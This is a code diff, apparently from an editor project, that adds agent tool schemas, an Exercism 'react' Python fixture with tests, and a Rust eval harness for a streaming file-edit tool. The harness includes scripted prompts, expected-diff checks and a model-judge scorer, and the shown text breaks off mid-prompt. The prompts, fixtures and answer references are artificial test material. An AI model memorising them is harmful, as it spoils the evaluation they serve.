"file_path": { + "type": "string", + "description": "The absolute path to the file to write (must be absolute, not relative)" + }, + "content": { + "type": "string", + "description": "The content to write to the file" + } + }, + "required": [ + "file_path", + "content" + ], + "additionalProperties": false, + "$schema": "http://json-schema.org/draft-07/schema#" + } + }, + { + "name": "ReadNotebook", + "description": "Extract and read source code from all code cells in a Jupyter notebook.", + "inputSchema": { + "type": "object", + "properties": { + "notebook_path": { + "type": "string", + "description": "The absolute path to the Jupyter notebook file to read (must be absolute, not relative)" + } + }, + "required": [ + "notebook_path" + ], + "additionalProperties": false, + "$schema": "http://json-schema.org/draft-07/schema#" + } + }, + { + "name": "NotebookEditCell", + "description": "Replace the contents of a specific cell in a Jupyter notebook.", + "inputSchema": { + "type": "object", + "properties": { + "notebook_path": { + "type": "string", + "description": "The absolute path to the Jupyter notebook file to edit (must be absolute, not relative)" + }, + "cell_number": { + "type": "number", + "description": "The index of the cell to edit (0-based)" + }, + "new_source": { + "type": "string", + "description": "The new source for the cell" + }, + "cell_type": { + "type": "string", + "enum": [ + "code", + "markdown" + ], + "description": "The type of the cell (code or markdown). If not specified, it defaults to the current cell type. If using edit_mode=insert, this is required." + }, + "edit_mode": { + "type": "string", + "description": "The type of edit to make (replace, insert, delete). Defaults to replace." + } + }, + "required": [ + "notebook_path", + "cell_number", + "new_source" + ], + "additionalProperties": false, + "$schema": "http://json-schema.org/draft-07/schema#" + } + }, + { + "name": "WebFetchTool", + "description": "Claude wants to fetch content from this URL", + "inputSchema": { + "type": "object", + "properties": { + "url": { + "type": "string", + "format": "uri", + "description": "The URL to fetch content from" + }, + "prompt": { + "type": "string", + "description": "The prompt to run on the fetched content" + } + }, + "required": [ + "url", + "prompt" + ], + "additionalProperties": false, + "$schema": "http://json-schema.org/draft-07/schema#" + } + } + ] + } +} +``` diff --git a/crates/agent/src/tools/evals/fixtures/zode/react.py b/crates/agent/src/tools/evals/fixtures/zode/react.py new file mode 100644 index 0000000000000000000000000000000000000000..03ff02e7891449fe2f3b45357a72410772276a0d --- /dev/null +++ b/crates/agent/src/tools/evals/fixtures/zode/react.py @@ -0,0 +1,14 @@ +class InputCell: + def __init__(self, initial_value): + self.value = None + + +class ComputeCell: + def __init__(self, inputs, compute_function): + self.value = None + + def add_callback(self, callback): + pass + + def remove_callback(self, callback): + pass diff --git a/crates/agent/src/tools/evals/fixtures/zode/react_test.py b/crates/agent/src/tools/evals/fixtures/zode/react_test.py new file mode 100644 index 0000000000000000000000000000000000000000..1f917e40b4167ed78c24b63151a2469f587bbda4 --- /dev/null +++ b/crates/agent/src/tools/evals/fixtures/zode/react_test.py @@ -0,0 +1,271 @@ +# These tests are auto-generated with test data from: +# https://github.com/exercism/problem-specifications/tree/main/exercises/react/canonical-data.json +# File last updated on 2023-07-19 + +from functools import partial +import unittest + +from react import ( + InputCell, + ComputeCell, +) + + +class ReactTest(unittest.TestCase): + def test_input_cells_have_a_value(self): + input = InputCell(10) + self.assertEqual(input.value, 10) + + def test_an_input_cell_s_value_can_be_set(self): + input = InputCell(4) + input.value = 20 + self.assertEqual(input.value, 20) + + def test_compute_cells_calculate_initial_value(self): + input = InputCell(1) + output = ComputeCell( + [ + input, + ], + lambda inputs: inputs[0] + 1, + ) + self.assertEqual(output.value, 2) + + def test_compute_cells_take_inputs_in_the_right_order(self): + one = InputCell(1) + two = InputCell(2) + output = ComputeCell( + [ + one, + two, + ], + lambda inputs: inputs[0] + inputs[1] * 10, + ) + self.assertEqual(output.value, 21) + + def test_compute_cells_update_value_when_dependencies_are_changed(self): + input = InputCell(1) + output = ComputeCell( + [ + input, + ], + lambda inputs: inputs[0] + 1, + ) + input.value = 3 + self.assertEqual(output.value, 4) + + def test_compute_cells_can_depend_on_other_compute_cells(self): + input = InputCell(1) + times_two = ComputeCell( + [ + input, + ], + lambda inputs: inputs[0] * 2, + ) + times_thirty = ComputeCell( + [ + input, + ], + lambda inputs: inputs[0] * 30, + ) + output = ComputeCell( + [ + times_two, + times_thirty, + ], + lambda inputs: inputs[0] + inputs[1], + ) + self.assertEqual(output.value, 32) + input.value = 3 + self.assertEqual(output.value, 96) + + def test_compute_cells_fire_callbacks(self): + input = InputCell(1) + output = ComputeCell( + [ + input, + ], + lambda inputs: inputs[0] + 1, + ) + cb1_observer = [] + callback1 = self.callback_factory(cb1_observer) + output.add_callback(callback1) + input.value = 3 + self.assertEqual(cb1_observer[-1], 4) + + def test_callback_cells_only_fire_on_change(self): + input = InputCell(1) + output = ComputeCell([input], lambda inputs: 111 if inputs[0] < 3 else 222) + cb1_observer = [] + callback1 = self.callback_factory(cb1_observer) + output.add_callback(callback1) + input.value = 2 + self.assertEqual(cb1_observer, []) + input.value = 4 + self.assertEqual(cb1_observer[-1], 222) + + def test_callbacks_do_not_report_already_reported_values(self): + input = InputCell(1) + output = ComputeCell( + [ + input, + ], + lambda inputs: inputs[0] + 1, + ) + cb1_observer = [] + callback1 = self.callback_factory(cb1_observer) + output.add_callback(callback1) + input.value = 2 + self.assertEqual(cb1_observer[-1], 3) + input.value = 3 + self.assertEqual(cb1_observer[-1], 4) + + def test_callbacks_can_fire_from_multiple_cells(self): + input = InputCell(1) + plus_one = ComputeCell( + [ + input, + ], + lambda inputs: inputs[0] + 1, + ) + minus_one = ComputeCell( + [ + input, + ], + lambda inputs: inputs[0] - 1, + ) + cb1_observer = [] + cb2_observer = [] + callback1 = self.callback_factory(cb1_observer) + callback2 = self.callback_factory(cb2_observer) + plus_one.add_callback(callback1) + minus_one.add_callback(callback2) + input.value = 10 + self.assertEqual(cb1_observer[-1], 11) + self.assertEqual(cb2_observer[-1], 9) + + def test_callbacks_can_be_added_and_removed(self): + input = InputCell(11) + output = ComputeCell( + [ + input, + ], + lambda inputs: inputs[0] + 1, + ) + cb1_observer = [] + cb2_observer = [] + cb3_observer = [] + callback1 = self.callback_factory(cb1_observer) + callback2 = self.callback_factory(cb2_observer) + callback3 = self.callback_factory(cb3_observer) + output.add_callback(callback1) + output.add_callback(callback2) + input.value = 31 + self.assertEqual(cb1_observer[-1], 32) + self.assertEqual(cb2_observer[-1], 32) + output.remove_callback(callback1) + output.add_callback(callback3) + input.value = 41 + self.assertEqual(len(cb1_observer), 1) + self.assertEqual(cb2_observer[-1], 42) + self.assertEqual(cb3_observer[-1], 42) + + def test_removing_a_callback_multiple_times_doesn_t_interfere_with_other_callbacks( + self, + ): + input = InputCell(1) + output = ComputeCell( + [ + input, + ], + lambda inputs: inputs[0] + 1, + ) + cb1_observer = [] + cb2_observer = [] + callback1 = self.callback_factory(cb1_observer) + callback2 = self.callback_factory(cb2_observer) + output.add_callback(callback1) + output.add_callback(callback2) + output.remove_callback(callback1) + output.remove_callback(callback1) + output.remove_callback(callback1) + input.value = 2 + self.assertEqual(cb1_observer, []) + self.assertEqual(cb2_observer[-1], 3) + + def test_callbacks_should_only_be_called_once_even_if_multiple_dependencies_change( + self, + ): + input = InputCell(1) + plus_one = ComputeCell( + [ + input, + ], + lambda inputs: inputs[0] + 1, + ) + minus_one1 = ComputeCell( + [ + input, + ], + lambda inputs: inputs[0] - 1, + ) + minus_one2 = ComputeCell( + [ + minus_one1, + ], + lambda inputs: inputs[0] - 1, + ) + output = ComputeCell( + [ + plus_one, + minus_one2, + ], + lambda inputs: inputs[0] * inputs[1], + ) + cb1_observer = [] + callback1 = self.callback_factory(cb1_observer) + output.add_callback(callback1) + input.value = 4 + self.assertEqual(cb1_observer[-1], 10) + + def test_callbacks_should_not_be_called_if_dependencies_change_but_output_value_doesn_t_change( + self, + ): + input = InputCell(1) + plus_one = ComputeCell( + [ + input, + ], + lambda inputs: inputs[0] + 1, + ) + minus_one = ComputeCell( + [ + input, + ], + lambda inputs: inputs[0] - 1, + ) + always_two = ComputeCell( + [ + plus_one, + minus_one, + ], + lambda inputs: inputs[0] - inputs[1], + ) + cb1_observer = [] + callback1 = self.callback_factory(cb1_observer) + always_two.add_callback(callback1) + input.value = 2 + self.assertEqual(cb1_observer, []) + input.value = 3 + self.assertEqual(cb1_observer, []) + input.value = 4 + self.assertEqual(cb1_observer, []) + input.value = 5 + self.assertEqual(cb1_observer, []) + + # Utility functions. + def callback_factory(self, observer): + def callback(observer, value): + observer.append(value) + + return partial(callback, observer) diff --git a/crates/agent/src/tools/evals/streaming_edit_file.rs b/crates/agent/src/tools/evals/streaming_edit_file.rs new file mode 100644 index 0000000000000000000000000000000000000000..0c6290ec098f9c37a0f6a077daf0a041c013d8ff --- /dev/null +++ b/crates/agent/src/tools/evals/streaming_edit_file.rs @@ -0,0 +1,1570 @@ +use crate::tools::streaming_edit_file_tool::*; +use crate::{ + AgentTool, ContextServerRegistry, EditFileTool, GrepTool, GrepToolInput, ListDirectoryTool, + ListDirectoryToolInput, ReadFileTool, ReadFileToolInput, StreamingEditFileTool, Template, + Templates, Thread, ToolCallEventStream, ToolInput, +}; +use Role::*; +use anyhow::{Context as _, Result}; +use client::{Client, RefreshLlmTokenListener, UserStore}; +use fs::FakeFs; +use futures::{FutureExt, StreamExt, future::LocalBoxFuture}; +use gpui::{AppContext as _, AsyncApp, Entity, TestAppContext, UpdateGlobal as _}; +use http_client::StatusCode; +use language::language_settings::FormatOnSave; +use language_model::{ + LanguageModel, LanguageModelCompletionError, LanguageModelCompletionEvent, + LanguageModelRegistry, LanguageModelRequest, LanguageModelRequestMessage, + LanguageModelRequestTool, LanguageModelToolResult, LanguageModelToolResultContent, + LanguageModelToolSchemaFormat, LanguageModelToolUse, LanguageModelToolUseId, MessageContent, + Role, SelectedModel, +}; +use project::Project; +use prompt_store::{ProjectContext, WorktreeContext}; +use rand::prelude::*; +use reqwest_client::ReqwestClient; +use serde::Serialize; +use serde_json::json; +use settings::SettingsStore; +use std::{ + fmt::{self, Display}, + path::{Path, PathBuf}, + str::FromStr, + sync::Arc, + time::Duration, +}; +use util::path; + +#[derive(Serialize)] +struct DiffJudgeTemplate { + diff: String, + assertions: &'static str, +} + +impl Template for DiffJudgeTemplate { + const TEMPLATE_NAME: &'static str = "diff_judge.hbs"; +} + +#[derive(Clone)] +struct EvalInput { + conversation: Vec, + input_file_path: PathBuf, + input_content: Option, + assertion: EvalAssertion, +} + +impl EvalInput { + fn new( + conversation: Vec, + input_file_path: impl Into, + input_content: Option, + assertion: EvalAssertion, + ) -> Self { + EvalInput { + conversation, + input_file_path: input_file_path.into(), + input_content, + assertion, + } + } +} + +#[derive(Clone)] +struct EvalSample { + text_before: String, + text_after: String, + tool_input: StreamingEditFileToolInput, + diff: String, +} + +trait AssertionFn: 'static + Send + Sync { + fn assert<'a>( + &'a self, + sample: &'a EvalSample, + judge_model: Arc, + cx: &'a mut TestAppContext, + ) -> LocalBoxFuture<'a, Result>; +} + +impl AssertionFn for F +where + F: 'static + + Send + + Sync + + AsyncFn( + &EvalSample, + Arc, + &mut TestAppContext, + ) -> Result, +{ + fn assert<'a>( + &'a self, + sample: &'a EvalSample, + judge_model: Arc, + cx: &'a mut TestAppContext, + ) -> LocalBoxFuture<'a, Result> { + (self)(sample, judge_model, cx).boxed_local() + } +} + +#[derive(Clone)] +struct EvalAssertion(Arc); + +impl EvalAssertion { + fn new(f: F) -> Self + where + F: 'static + + Send + + Sync + + AsyncFn( + &EvalSample, + Arc, + &mut TestAppContext, + ) -> Result, + { + EvalAssertion(Arc::new(f)) + } + + fn assert_eq(expected: impl Into) -> Self { + let expected = expected.into(); + Self::new(async move |sample, _judge, _cx| { + Ok(EvalAssertionOutcome { + score: if strip_empty_lines(&sample.text_after) == strip_empty_lines(&expected) { + 100 + } else { + 0 + }, + message: None, + }) + }) + } + + fn assert_diff_any(expected_diffs: Vec>) -> Self { + let expected_diffs: Vec = expected_diffs.into_iter().map(Into::into).collect(); + Self::new(async move |sample, _judge, _cx| { + let matches = expected_diffs.iter().any(|possible_diff| { + language::apply_diff_patch(&sample.text_before, possible_diff) + .map(|expected| { + strip_empty_lines(&expected) == strip_empty_lines(&sample.text_after) + }) + .unwrap_or(false) + }); + + Ok(EvalAssertionOutcome { + score: if matches { 100 } else { 0 }, + message: None, + }) + }) + } + + fn judge_diff(assertions: &'static str) -> Self { + Self::new(async move |sample, judge, cx| { + let prompt = DiffJudgeTemplate { + diff: sample.diff.clone(), + assertions, + } + .render(&Templates::new()) + .context("Failed to render diff judge template")?; + + let request = LanguageModelRequest { + messages: vec![LanguageModelRequestMessage { + role: Role::User, + content: vec![prompt.into()], + cache: false, + reasoning_details: None, + }], + thinking_allowed: true, + thinking_effort: judge + .default_effort_level() + .map(|effort_level| effort_level.value.to_string()), + ..Default::default() + }; + let mut response = retry_on_rate_limit(async || { + Ok(judge + .stream_completion_text(request.clone(), &cx.to_async()) + .await?) + }) + .await?; + let mut output = String::new(); + while let Some(chunk) = response.stream.next().await { + let chunk = chunk?; + output.push_str(&chunk); + } + + let re = regex::Regex::new(r"(\d+)") + .context("Failed to compile score regex")?; + if let Some(captures) = re.captures(&output) + && let Some(score_match) = captures.get(1) + { + let score = score_match.as_str().parse().unwrap_or(0); + return Ok(EvalAssertionOutcome { + score, + message: Some(output), + }); + } + + anyhow::bail!("No score found in response. Raw output: {output}"); + }) + } + + async fn run( + &self, + input: &EvalSample, + judge_model: Arc, + cx: &mut TestAppContext, + ) -> Result { + self.0.assert(input, judge_model, cx).await + } +} + +#[derive(Clone)] +struct StreamingEditEvalOutput { + sample: EvalSample, + assertion: EvalAssertionOutcome, +} + +impl Display for StreamingEditEvalOutput { + fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { + writeln!(f, "Score: {:?}", self.assertion.score)?; + if let Some(message) = self.assertion.message.as_ref() { + writeln!(f, "Message: {}", message)?; + } + writeln!(f, "Diff:\n{}", self.sample.diff)?; + writeln!(f, "Tool Input:\n{:#?}", self.sample.tool_input)?; + Ok(()) + } +} + +#[derive(Clone, Debug, Eq, PartialEq, Hash)] +struct EvalAssertionOutcome { + score: usize, + message: Option, +} + +struct StreamingEditToolTest { + fs: Arc, + project: Entity, + model: Arc, + judge_model: Arc, + model_thinking_effort: Option, +} + +impl StreamingEditToolTest { + async fn new(cx: &mut TestAppContext) -> Self { + cx.executor().allow_parking(); + + let fs = FakeFs::new(cx.executor()); + cx.update(|cx| { + let settings_store = SettingsStore::test(cx); + cx.set_global(settings_store); + SettingsStore::update_global(cx, |store: &mut SettingsStore, cx| { + store.update_user_settings(cx, |settings| { + settings + .project + .all_languages + .defaults + .ensure_final_newline_on_save = Some(false); + settings.project.all_languages.defaults.format_on_save = + Some(FormatOnSave::Off); + }); + }); + + gpui_tokio::init(cx); + let http_client = Arc::new(ReqwestClient::user_agent("agent tests").unwrap()); + cx.set_http_client(http_client); + let client = Client::production(cx); + let user_store = cx.new(|cx| UserStore::new(client.clone(), cx)); + language_model::init(cx); + RefreshLlmTokenListener::register(client.clone(), user_store.clone(), cx); + language_models::init(user_store, client, cx); + }); + + fs.insert_tree("/root", json!({})).await; + let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; + let agent_model = SelectedModel::from_str( + &std::env::var("ZED_AGENT_MODEL") + .unwrap_or("anthropic/claude-sonnet-4-6-latest".into()), + ) + .unwrap(); + let judge_model = SelectedModel::from_str( + &std::env::var("ZED_JUDGE_MODEL") + .unwrap_or("anthropic/claude-sonnet-4-6-latest".into()), + ) + .unwrap(); + + let authenticate_provider_tasks = cx.update(|cx| { + LanguageModelRegistry::global(cx).update(cx, |registry, cx| { + registry + .providers() + .iter() + .map(|p| p.authenticate(cx)) + .collect::>() + }) + }); + let (model, judge_model) = cx + .update(|cx| { + cx.spawn(async move |cx| { + futures::future::join_all(authenticate_provider_tasks).await; + let model = Self::load_model(&agent_model, cx).await; + let judge_model = Self::load_model(&judge_model, cx).await; + (model.unwrap(), judge_model.unwrap()) + }) + }) + .await; + + let model_thinking_effort = model + .default_effort_level() + .map(|effort_level| effort_level.value.to_string()); + + Self { + fs, + project, + model, + judge_model, + model_thinking_effort, + } + } + + async fn load_model( + selected_model: &SelectedModel, + cx: &mut AsyncApp, + ) -> Result> { + cx.update(|cx| { + let registry = LanguageModelRegistry::read_global(cx); + let provider = registry + .provider(&selected_model.provider) + .expect("Provider not found"); + provider.authenticate(cx) + }) + .await?; + Ok(cx.update(|cx| { + let models = LanguageModelRegistry::read_global(cx); + models + .available_models(cx) + .find(|model| { + model.provider_id() == selected_model.provider + && model.id() == selected_model.model + }) + .unwrap_or_else(|| panic!("Model {} not found", selected_model.model.0)) + })) + } + + /// Build the tool definitions for the model, replacing `edit_file` with the + /// streaming edit file tool schema. In production the streaming tool is + /// exposed under the name `"edit_file"` (see `Thread::enabled_tools`), so + /// the model has never seen the name `"streaming_edit_file"`. + fn build_tools() -> Vec { + let mut tools: Vec = crate::built_in_tools() + .filter(|tool| tool.name != EditFileTool::NAME) + .collect(); + tools.push(LanguageModelRequestTool { + name: EditFileTool::NAME.to_string(), + description: StreamingEditFileTool::description().to_string(), + input_schema: StreamingEditFileTool::input_schema( + LanguageModelToolSchemaFormat::JsonSchema, + ) + .to_value(), + use_input_streaming: StreamingEditFileTool::supports_input_streaming(), + }); + tools + } + + async fn eval( + &self, + mut eval: EvalInput, + cx: &mut TestAppContext, + ) -> Result { + eval.conversation + .last_mut() + .context("Conversation must not be empty")? + .cache = true; + + // Populate the FakeFs so `resolve_path` / `entry_for_path` can find + // the file in the worktree. + if let Some(input_content) = eval.input_content.as_deref() { + let abs_path = Path::new("/root").join( + eval.input_file_path + .strip_prefix("root") + .unwrap_or(&eval.input_file_path), + ); + self.fs.insert_file(&abs_path, input_content.into()).await; + + // Wait for the worktree to pick up the new file. + cx.run_until_parked(); + } + + let tools = Self::build_tools(); + + let system_prompt = { + let worktrees = vec![WorktreeContext { + root_name: "root".to_string(), + abs_path: Path::new("/path/to/root").into(), + rules_file: None, + }]; + let project_context = ProjectContext::new(worktrees, Vec::default()); + let tool_names = tools + .iter() + .map(|tool| tool.name.clone().into()) + .collect::>(); + let template = crate::SystemPromptTemplate { + project: &project_context, + available_tools: tool_names, + model_name: None, + }; + let templates = Templates::new(); + template.render(&templates)? + }; + + let has_system_prompt = eval + .conversation + .first() + .is_some_and(|msg| msg.role == Role::System); + let messages = if has_system_prompt { + eval.conversation + } else { + [LanguageModelRequestMessage { + role: Role::System, + content: vec![MessageContent::Text(system_prompt)], + cache: true, + reasoning_details: None, + }] + .into_iter() + .chain(eval.conversation) + .collect::>() + }; + + let request = LanguageModelRequest { + messages, + tools, + thinking_allowed: true, + thinking_effort: self.model_thinking_effort.clone(), + ..Default::default() + }; + + // The model will call the tool as "edit_file" (the production-visible + // name), but the schema is from StreamingEditFileTool. + let tool_input = + retry_on_rate_limit(async || self.extract_tool_use(request.clone(), cx).await).await?; + + let language_registry = self + .project + .read_with(cx, |project, _cx| project.languages().clone()); + + let context_server_registry = cx + .new(|cx| ContextServerRegistry::new(self.project.read(cx).context_server_store(), cx)); + let thread = cx.new(|cx| { + Thread::new( + self.project.clone(), + cx.new(|_cx| ProjectContext::default()), + context_server_registry, + Templates::new(), + Some(self.model.clone()), + cx, + ) + }); + let action_log = thread.read_with(cx, |thread, _| thread.action_log().clone()); + + let tool = Arc::new(StreamingEditFileTool::new( + self.project.clone(), + thread.downgrade(), + action_log, + language_registry, + )); + + let result = cx + .update(|cx| { + tool.clone().run( + ToolInput::resolved(tool_input.clone()), + ToolCallEventStream::test().0, + cx, + ) + }) + .await; + + let output = match result { + Ok(output) => output, + Err(output) => { + anyhow::bail!("Tool returned error: {}", output); + } + }; + + let StreamingEditFileToolOutput::Success { new_text, .. } = &output else { + anyhow::bail!("Tool returned error output: {}", output); + }; + + let sample = EvalSample { + tool_input, + diff: language::unified_diff( + eval.input_content.as_deref().unwrap_or_default(), + new_text, + ), + text_before: eval.input_content.unwrap_or_default(), + text_after: new_text.clone(), + }; + + let assertion = eval + .assertion + .run(&sample, self.judge_model.clone(), cx) + .await?; + + Ok(StreamingEditEvalOutput { assertion, sample }) + } + + /// Stream the model completion and extract the first complete tool use + /// whose name matches `EditFileTool::NAME` (the production-visible name + /// for the streaming edit tool), parsed as `StreamingEditFileToolInput`. + async fn extract_tool_use( + &self, + request: LanguageModelRequest, + cx: &mut TestAppContext, + ) -> Result { + let model = self.model.clone(); + let events = cx + .update(|cx| { + let async_cx = cx.to_async(); + cx.foreground_executor() + .spawn(async move { model.stream_completion(request, &async_cx).await }) + }) + .await + .map_err(|err| anyhow::anyhow!("completion error: {}", err))?; + + let mut streamed_text = String::new(); + let mut stop_reason = None; + let mut parse_errors = Vec::new(); + + let mut events = events.fuse(); + while let Some(event) = events.next().await { + match event { + Ok(LanguageModelCompletionEvent::ToolUse(tool_use)) + if tool_use.is_input_complete + && tool_use.name.as_ref() == EditFileTool::NAME => + { + let input: StreamingEditFileToolInput = serde_json::from_value(tool_use.input) + .context("Failed to parse tool input as StreamingEditFileToolInput")?; + return Ok(input); + } + Ok(LanguageModelCompletionEvent::Text(text)) => { + if streamed_text.len() < 2_000 { + streamed_text.push_str(&text); + } + } + Ok(LanguageModelCompletionEvent::Stop(reason)) => { + stop_reason = Some(reason); + } + Ok(LanguageModelCompletionEvent::ToolUseJsonParseError { + tool_name, + raw_input, + json_parse_error, + .. + }) if tool_name.as_ref() == EditFileTool::NAME => { + parse_errors.push(format!("{json_parse_error}\nRaw input:\n{raw_input:?}")); + } + Err(err) => { + return Err(anyhow::anyhow!("completion error: {}", err)); + } + _ => {} + } + } + + let streamed_text = streamed_text.trim(); + let streamed_text_suffix = if streamed_text.is_empty() { + String::new() + } else { + format!("\nStreamed text:\n{streamed_text}") + }; + let stop_reason_suffix = stop_reason + .map(|reason| format!("\nStop reason: {reason:?}")) + .unwrap_or_default(); + let parse_errors_suffix = if parse_errors.is_empty() { + String::new() + } else { + format!("\nTool parse errors:\n{}", parse_errors.join("\n")) + }; + + anyhow::bail!( + "Stream ended without an edit_file tool use{stop_reason_suffix}{parse_errors_suffix}{streamed_text_suffix}" + ) + } +} + +fn run_eval(eval: EvalInput) -> eval_utils::EvalOutput<()> { + let dispatcher = gpui::TestDispatcher::new(rand::random()); + let mut cx = TestAppContext::build(dispatcher, None); + let foreground_executor = cx.foreground_executor().clone(); + let result = foreground_executor.block_test(async { + let test = StreamingEditToolTest::new(&mut cx).await; + let result = test.eval(eval, &mut cx).await; + drop(test); + cx.run_until_parked(); + result + }); + cx.quit(); + match result { + Ok(output) => eval_utils::EvalOutput { + data: output.to_string(), + outcome: if output.assertion.score < 80 { + eval_utils::OutcomeKind::Failed + } else { + eval_utils::OutcomeKind::Passed + }, + metadata: (), + }, + Err(err) => eval_utils::EvalOutput { + data: format!("{err:?}"), + outcome: eval_utils::OutcomeKind::Error, + metadata: (), + }, + } +} + +fn message( + role: Role, + contents: impl IntoIterator, +) -> LanguageModelRequestMessage { + LanguageModelRequestMessage { + role, + content: contents.into_iter().collect(), + cache: false, + reasoning_details: None, + } +} + +fn text(text: impl Into) -> MessageContent { + MessageContent::Text(text.into()) +} + +fn lines(input: &str, range: std::ops::Range) -> String { + input + .lines() + .skip(range.start) + .take(range.len()) + .collect::>() + .join("\n") +} + +fn tool_use( + id: impl Into>, + name: impl Into>, + input: impl Serialize, +) -> MessageContent { + MessageContent::ToolUse(LanguageModelToolUse { + id: LanguageModelToolUseId::from(id.into()), + name: name.into(), + raw_input: serde_json::to_string_pretty(&input).unwrap(), + input: serde_json::to_value(input).unwrap(), + is_input_complete: true, + thought_signature: None, + }) +} + +fn tool_result( + id: impl Into>, + name: impl Into>, + result: impl Into>, +) -> MessageContent { + MessageContent::ToolResult(LanguageModelToolResult { + tool_use_id: LanguageModelToolUseId::from(id.into()), + tool_name: name.into(), + is_error: false, + content: LanguageModelToolResultContent::Text(result.into()), + output: None, + }) +} + +fn strip_empty_lines(text: &str) -> String { + text.lines() + .filter(|line| !line.trim().is_empty()) + .collect::>() + .join("\n") +} + +async fn retry_on_rate_limit(mut request: impl AsyncFnMut() -> Result) -> Result { + const MAX_RETRIES: usize = 20; + let mut attempt = 0; + + loop { + attempt += 1; + let response = request().await; + + if attempt >= MAX_RETRIES { + return response; + } + + let retry_delay = match &response { + Ok(_) => None, + Err(err) => match err.downcast_ref::() { + Some(err) => match &err { + LanguageModelCompletionError::RateLimitExceeded { retry_after, .. } + | LanguageModelCompletionError::ServerOverloaded { retry_after, .. } => { + Some(retry_after.unwrap_or(Duration::from_secs(5))) + } + LanguageModelCompletionError::UpstreamProviderError { + status, + retry_after, + .. + } => { + let should_retry = matches!( + *status, + StatusCode::TOO_MANY_REQUESTS | StatusCode::SERVICE_UNAVAILABLE + ) || status.as_u16() == 529; + + if should_retry { + Some(retry_after.unwrap_or(Duration::from_secs(5))) + } else { + None + } + } + LanguageModelCompletionError::ApiReadResponseError { .. } + | LanguageModelCompletionError::ApiInternalServerError { .. } + | LanguageModelCompletionError::HttpSend { .. } => { + Some(Duration::from_secs(2_u64.pow((attempt - 1) as u32).min(30))) + } + _ => None, + }, + _ => None, + }, + }; + + if let Some(retry_after) = retry_delay { + let jitter = retry_after.mul_f64(rand::rng().random_range(0.0..1.0)); + eprintln!("Attempt #{attempt}: Retry after {retry_after:?} + jitter of {jitter:?}"); + #[allow(clippy::disallowed_methods)] + smol::Timer::after(retry_after + jitter).await; + } else { + return response; + } + } +} + +#[test] +#[cfg_attr(not(feature = "unit-eval"), ignore)] +fn eval_delete_function() { + let input_file_path = "root/blame.rs"; + let input_file_content = include_str!("fixtures/delete_run_git_blame/before.rs"); + let output_file_content = include_str!("fixtures/delete_run_git_blame/after.rs"); + let possible_diffs = vec![ + language::unified_diff(input_file_content, output_file_content), + language::unified_diff( + input_file_content, + &output_file_content + .replace( + "const GIT_BLAME_NO_COMMIT_ERROR: &str = \"fatal: no such ref: HEAD\";\n", + "", + ) + .replace( + "const GIT_BLAME_NO_PATH: &str = \"fatal: no such path\";\n", + "", + ), + ), + ]; + + eval_utils::eval(100, 0.95, eval_utils::NoProcessor, move || { + run_eval(EvalInput::new( + vec![ + message( + User, + [text(indoc::formatdoc! {" + Read the `{input_file_path}` file and delete `run_git_blame`. Just that + one function, not its usages. + "})], + ), + message( + Assistant, + [tool_use( + "tool_1", + ReadFileTool::NAME, + ReadFileToolInput { + path: input_file_path.into(), + start_line: None, + end_line: None, + }, + )], + ), + message( + User, + [tool_result( + "tool_1", + ReadFileTool::NAME, + input_file_content, + )], + ), + ], + input_file_path, + Some(input_file_content.into()), + EvalAssertion::assert_diff_any(possible_diffs.clone()), + )) + }); +} + +#[test] +#[cfg_attr(not(feature = "unit-eval"), ignore)] +fn eval_extract_handle_command_output() { + let input_file_path = "root/blame.rs"; + let input_file_content = include_str!("fixtures/extract_handle_command_output/before.rs"); + let possible_diffs = vec![ + include_str!("fixtures/extract_handle_command_output/possible-01.diff"), + include_str!("fixtures/extract_handle_command_output/possible-02.diff"), + include_str!("fixtures/extract_handle_command_output/possible-03.diff"), + include_str!("fixtures/extract_handle_command_output/possible-04.diff"), + include_str!("fixtures/extract_handle_command_output/possible-05.diff"), + include_str!("fixtures/extract_handle_command_output/possible-06.diff"), + include_str!("fixtures/extract_handle_command_output/possible-07.diff"), + include_str!("fixtures/extract_handle_command_output/possible-08.diff"), + include_str!("fixtures/extract_handle_command_output/possible-09.diff"), + ]; + + eval_utils::eval(100, 0.95, eval_utils::NoProcessor, move || { + run_eval(EvalInput::new( + vec![ + message( + User, + [text(indoc::formatdoc! {" + Read the `{input_file_path}` file and extract a method in + the final stanza of `run_git_blame` to deal with command failures, + call it `handle_command_output` and take the std::process::Output as the only parameter. + Do not document the method and do not add any comments. + + Add it right next to `run_git_blame` and copy it verbatim from `run_git_blame`. + "})], + ), + message( + Assistant, + [tool_use( + "tool_1", + ReadFileTool::NAME, + ReadFileToolInput { + path: input_file_path.into(), + start_line: None, + end_line: None, + }, + )], + ), + message( + User, + [tool_result( + "tool_1", + ReadFileTool::NAME, + input_file_content, + )], + ), + ], + input_file_path, + Some(input_file_content.into()), + EvalAssertion::assert_diff_any(possible_diffs.clone()), + )) + }); +} + +#[test] +#[cfg_attr(not(feature = "unit-eval"), ignore)] +fn eval_translate_doc_comments() { + let input_file_path = "root/canvas.rs"; + let input_file_content = include_str!("fixtures/translate_doc_comments/before.rs"); + + eval_utils::eval(200, 1., eval_utils::NoProcessor, move || { + run_eval(EvalInput::new( + vec![ + message( + User, + [text(indoc::formatdoc! {" + Read the `{input_file_path}` file and edit it (without overwriting it), + translating all the doc comments to italian. + "})], + ), + message( + Assistant, + [tool_use( + "tool_1", + ReadFileTool::NAME, + ReadFileToolInput { + path: input_file_path.into(), + start_line: None, + end_line: None, + }, + )], + ), + message( + User, + [tool_result( + "tool_1", + ReadFileTool::NAME, + input_file_content, + )], + ), + ], + input_file_path, + Some(input_file_content.into()), + EvalAssertion::judge_diff("Doc comments were translated to Italian"), + )) + }); +} + +#[test] +#[cfg_attr(not(feature = "unit-eval"), ignore)] +fn eval_use_wasi_sdk_in_compile_parser_to_wasm() { + let input_file_path = "root/lib.rs"; + let input_file_content = + include_str!("fixtures/use_wasi_sdk_in_compile_parser_to_wasm/before.rs"); + + eval_utils::eval(100, 0.95, eval_utils::NoProcessor, move || { + run_eval(EvalInput::new( + vec![ + message( + User, + [text(indoc::formatdoc! {" + Read the `{input_file_path}` file and change `compile_parser_to_wasm` to use `wasi-sdk` instead of emscripten. + Use `ureq` to download the SDK for the current platform and architecture. + Extract the archive into a sibling of `lib` inside the `tree-sitter` directory in the cache_dir. + Compile the parser to wasm using the `bin/clang` executable (or `bin/clang.exe` on windows) + that's inside of the archive. + Don't re-download the SDK if that executable already exists. + + Use these clang flags: -fPIC -shared -Os -Wl,--export=tree_sitter_{{language_name}} + + Here are the available wasi-sdk assets: + - 